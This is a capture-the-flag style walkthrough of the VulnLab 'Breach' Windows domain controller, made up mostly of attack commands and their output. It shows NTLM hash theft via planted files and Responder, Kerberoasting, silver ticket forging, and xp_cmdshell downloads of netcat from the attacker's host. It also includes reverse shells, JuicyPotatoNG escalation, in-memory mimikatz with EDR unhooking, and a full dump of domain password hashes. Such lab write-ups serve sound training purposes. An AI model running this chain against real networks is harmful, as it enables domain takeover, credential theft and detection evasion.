vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe

we  create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

.

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient -N -L 10.129.212.120

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    share           Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.212.120 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

we find 3 usernames

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ smbclient \\\\10.129.212.120\\share -U Guest 
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Sep  8 13:13:00 2025
  ..                                DHS        0  Tue Sep  9 12:35:32 2025
  finance                             D        0  Thu Feb 17 12:19:34 2022
  software                            D        0  Thu Feb 17 12:19:12 2022
  transfer                            D        0  Mon Sep  8 12:13:44 2025

        7863807 blocks of size 4096. 1504600 blocks available
smb: \> cd transfer
smb: \transfer\> ls
  .                                   D        0  Mon Sep  8 12:13:44 2025
  ..                                  D        0  Mon Sep  8 13:13:00 2025
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
  julia.wong                          D        0  Thu Apr 17 02:38:12 2025

        7863807 blocks of size 4096. 1498643 blocks available
smb: \transfer\> 

Transfer files

┌──(puck㉿kali)-[~/vulnlab/breach/ntlm_theft/puckie]
└─$ smbclient //10.129.212.120/share -U "Guest"%"" -c 'prompt OFF; cd transfer; lcd /home/puck/vulnlab/breach/untlm_theft/puckie; mput *' 

chdir to /home/puck/vulnlab/breach/untlm_theft/puckie failed (No such file or directory)
putting file puckie-(url).url as \transfer\puckie-(url).url (1.7 kb/s) (average 1.7 kb/s)
putting file puckie.scf as \transfer\puckie.scf (2.6 kb/s) (average 2.1 kb/s)
putting file puckie-(icon).url as \transfer\puckie-(icon).url (3.5 kb/s) (average 2.6 kb/s)
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/breach/ntlm_theft/puckie]

and get hash with responder

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong

.

The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.

hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt

 

Having the password now of Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nxc smb 10.129.212.120 -u 'julia.wong' -p 'Computer1'       
SMB         10.129.212.120  445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.129.212.120  445    BREACHDC         [+] breach.vl\julia.wong:Computer1 

Starting with Kerberoasting I get a hash for svc_mssql. Its a service account for the mssql server. In AD when users have the servicePrincipalName or SPN attribute set like with service accounts its possible to request a ticket which is encrypted with the hash derived from the service account’s password.

, we run

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
                                                                                                                     

This hash cracks with john and hashcat

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ john svc*_sql_hash.txt -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1         (?)     
1g 0:00:00:00 DONE (2025-10-29 09:44) 25.00g/s 1331Kp/s 1331Kc/s 1331KC/s chloelouise..spook
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ hashcat svc_sql.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$27587cd9b5f8f5fed557b2e02028dfb3$f11493c884adff4f1c8fda7eab664cf08f5621f2b1c5e68d52cd0d19ed7997cceb3ceecada2f6dffb0531dae17b00a4b00f0a07fc9dd8731bfbea9821d386022a3eff776eb0d270dd67f9f53531ff43462e335b4ec0d0d6b4941b810e3faf1d18789db0a8eccb0f88d5929b891c8df73fa9c70d7b3b003e8c4a930923bc7a9a64bbaf41993bec08c3a7da54b79c23a76da231e90b08dfc86d700aaf53fe4387159d2ac1a064f7f9a195c57e1f5147f6e871861b72c7b20599ef2fd2c8719154bf5c87fb6742ae2d4a58f914125c42c46b3457a8667ef165c417bb203de3497cff0d89a3fd026cb7cab9f2110ef50cdbfad181794ad871d4717aa67019fb0ea47df73723123166cd3fba653d17aaa7c54c1a82045451e60ecafe7592e87b06cfce5322c1dfb9d210d24659c68b4f74ee704cc2bb369c4cab99b9f8ba1a83358fda729c9146932caab6c89aa96a1bd7a17d928e756a7dd46d41e83d90206f27752356cdfbe4578c62af4d6024946825f6024a3899cadfd02696562ff5f943da13842352b480dd7b8e175450f5b7a3c7ee7f6de26b8b9c0e9776f0f5d2233a5451057d3b8fc643fb3e26f2d5c81ed331adf850fe9d9bf1d64d33a3b90f5c6f6c332dd4e0066448b9679e641fa0a31c5edb4d7223b308d83ee9b6d68dcd8ea4577197de758f1c223e7f030c3fb7658501e5200744769411b191e1f77fc97431708e0b9383f296b384c987be07031b8b5327262d12bc75fb8c28f2438b2e83618d8d4ea551785da3748999c33fa6b237cc059147d48ad4087a3cecb0984fc59e19fcdecad7ea92738d627392ae8687c5840a3c2833ca337db8300e7f58e6e2b7f0e11c3326d0e8f3691af4ac53f3647251be87fceb282a614f0d7eeefee7cd58b9aa6238c59370cd71b6ea103a99dee04806eb616621096980cd54b74a491c11356ff4a771faaea5f3aa2f67ae5d2f048a57c54265221e50f95700e4f5e1d47f5a4c3ec48112de9584c7e6fb5e30b86159d8797f9bf8e2884f8cb149c985cfd15b6d795ce0693d0156e055e3f737696bc8c4bfa4ead9a8e5618679fcd06732399e2c1ef71444f2019e953e9be37ba76bd460dc01fe256f58cdcdd3cb882d88ab98242917504322ab06af918ce035d1164c818c29a103164d8a39ca6da8a68b22212d72f849a6f89e8faef03f8043dd66bc76ce9bcf133c2d2db867150ae671520b7d1a42de1262756b11047a056e40800239ed34fcdf6af509bd9e9d73957b439910042fe69ead83a21222e428c9ba07eb15a17a3648de5fa6fa98083e88180ccb67e2e05737f5bb069b647fd2af2bfa5b0dd53f8664dda9c3ae21907035fc9045d7c8af8ce71ab1c2d08707f81cc5251de1e571bc53f57dbd761cc6804f42760be182faa3b0e214f9a8cbd31acd0ed0353777039c62808cc166d95cada0ebf21663bcf40783afd5945627ddfadf04c59ffe0ccfeea1b:Trustno1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssq...feea1b

 

 

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket create with the NTLM hash of the svc_mysql user:

In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

.

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

.

 

SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


 

 

.

 

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


.


Beyond root

"cmd /c C:\Users\Public\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"

C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe sekurlsa::evasive-keys exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments :

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/



mimikatz(commandline) # sekurlsa::evasive-keys

Authentication Id : 0 ; 8335143 (00000000:007f2f27)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 10/29/2025 9:34:28 AM
SID               : S-1-5-96-0-3

         * Username : BREACHDC$
         * Domain   : breach.vl
         * Password : 52 2d 49 84 34 de f5 43 a7 09 a8 1a ef 8d e0 25 70 e8 66 9f eb d8 64 05 8f c3 90 70 0d 77 88 36 e4 22 08 80 86 26 9c f4 02 46 1e c9 8d 8e 7e 50 b8 d2 fe 6c 32 cc be f1 c8 a0 cf f5 f6 bd cb a3 4a 8c cc 94 28 7b b9 49 b7 23 84 65 80 0d 7c bc 33 ca 4b ac d3 6e 27 a8 1e 3e 22 7c f2 f3 f2 b1 21 3b c7 38 d6 cc be 50 5c bf 1e cf 55 e8 cc 48 90 43 fc 51 7e c0 1f 4d 17 6b df 8c e9 59 c1 a3 27 03 4e 6f b5 a1 69 99 a1 55 28 16 fe e5 ed e7 5b 64 1c cb 90 ae 7f db e9 da 5f e8 25 cc e5 74 30 41 92 d8 5d 59 bd c8 b9 d9 cc 6f d8 2d d2 3b 4b c9 31 5e fa ae 57 c4 0a b3 0a f8 52 24 37 e8 33 f6 37 1c f4 bb 69 61 23 65 98 d1 0a 72 4e 1a 7f 78 37 ce ec 13 d1 11 44 da bc 3e 4c f1 70 48 12 f9 1b e7 3b f8 a1 49 73 27 8f 0e 9d 8e b1 71
         * Key List :
           aes256_hmac       57db133d25ef4c3119e44df6fb3052a6009d1b11c2cbf77711d67f0c048e0a0e
           aes128_hmac       4379b623157e83033c8afb60dfdf5536
           rc4_hmac_nt       dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_old      dd953936e414a1c2e1b4e1a062aa4a22
           rc4_md4           dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_nt_exp   dd953936e414a1c2e1b4e1a062aa4a22
           rc4_hmac_old_exp  dd953936e414a1c2e1b4e1a062aa4a22

--snip--

Authentication Id : 0 ; 528552 (00000000:000810a8)
Session           : Service from 0
User Name         : svc_mssql
Domain            : BREACH
Logon Server      : BREACHDC
Logon Time        : 10/29/2025 8:15:23 AM
SID               : S-1-5-21-2330692793-3312915120-706255856-1115

         * Username : svc_mssql
         * Domain   : BREACH.VL
         * Password : (null)
         * Key List :
           aes256_hmac       acb4bc05dee5b6cd685b7f54810327378726f441e1a780406bfdf5ffeec1686a
           rc4_hmac_nt       69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_old      69596c7aa1e8daee17f8e78870e25a5c
           rc4_md4           69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_nt_exp   69596c7aa1e8daee17f8e78870e25a5c
           rc4_hmac_old_exp  69596c7aa1e8daee17f8e78870e25a5c

Authentication Id : 0 ; 513330 (00000000:0007d532)
Session           : Interactive from 1
User Name         : julia.wong
Domain            : BREACH
Logon Server      : BREACHDC
Logon Time        : 10/29/2025 8:15:13 AM
SID               : S-1-5-21-2330692793-3312915120-706255856-1106

         * Username : Julia.Wong
         * Domain   : BREACH.VL
         * Password : (null)
         * Key List :
           aes256_hmac       24870ecb6cd96aa3b89c3b6f24076f3e0ea76dd14e2f21b52037e6b6e5494c11
           rc4_hmac_nt       b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_old      b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_md4           b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_nt_exp   b4c8a5ef4dd292edd06b613d2c518ddc
           rc4_hmac_old_exp  b4c8a5ef4dd292edd06b613d2c518ddc

--snip--



mimikatz(commandline) # exit
Bye!

C:\Windows\system32>

.

"cmd /c C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"

C:\Windows\system32>C:\temp\Loader.exe -path http://10.10.14.34:8000/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://10.10.14.34:8000/SafetyKatz.exe Arguments : lsadump::evasive-lsa /patch exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/



mimikatz(commandline) # lsadump::evasive-lsa /patch
Domain : BREACH / S-1-5-21-2330692793-3312915120-706255856

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : ebb948d32f7e896aa0d3934ec7a1b868

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 051e1c9e689e7e4c9fb7164433b9ba8e

RID  : 00000451 (1105)
User : Claire.Pope
LM   :
NTLM : 407269bacd94665e972e2c61c1de7a15

RID  : 00000452 (1106)
User : Julia.Wong
LM   :
NTLM : b4c8a5ef4dd292edd06b613d2c518ddc

RID  : 00000453 (1107)
User : Hilary.Reed
LM   :
NTLM : 39da4813065bd52215fb5614b956873b

RID  : 00000454 (1108)
User : Diana.Pope
LM   :
NTLM : ee1458cde3182d47514a107afd1236f2

RID  : 00000455 (1109)
User : Jasmine.Price
LM   :
NTLM : 4c8c779f1e48435bb0bf235afd921988

RID  : 00000456 (1110)
User : George.Williams
LM   :
NTLM : 8a3891bd96479611d4eec391ca592519

RID  : 00000457 (1111)
User : Lawrence.Kaur
LM   :
NTLM : 2ed316bf52a9f155fc25440fae777d0f

RID  : 00000458 (1112)
User : Jasmine.Slater
LM   :
NTLM : 6df17991ea82048f8f03734f1f4449c8

RID  : 00000459 (1113)
User : Hugh.Watts
LM   :
NTLM : 656f2dbe61c431b5ca58a1a5001d51f6

RID  : 0000045a (1114)
User : Christine.Bruce
LM   :
NTLM : 74eeaab55e418b6247ea35db833da742

RID  : 0000045b (1115)
User : svc_mssql
LM   :
NTLM : 69596c7aa1e8daee17f8e78870e25a5c

RID  : 00001bbd (7101)
User : puck
LM   :
NTLM : 6dfcb20c87d04f9a4f9605f2413395d4

RID  : 000003e8 (1000)
User : BREACHDC$
LM   :
NTLM : dd953936e414a1c2e1b4e1a062aa4a22

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ evil-winrm -i breach.vl -u Administrator -H ebb948d32f7e896aa0d3934ec7a1b868 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

.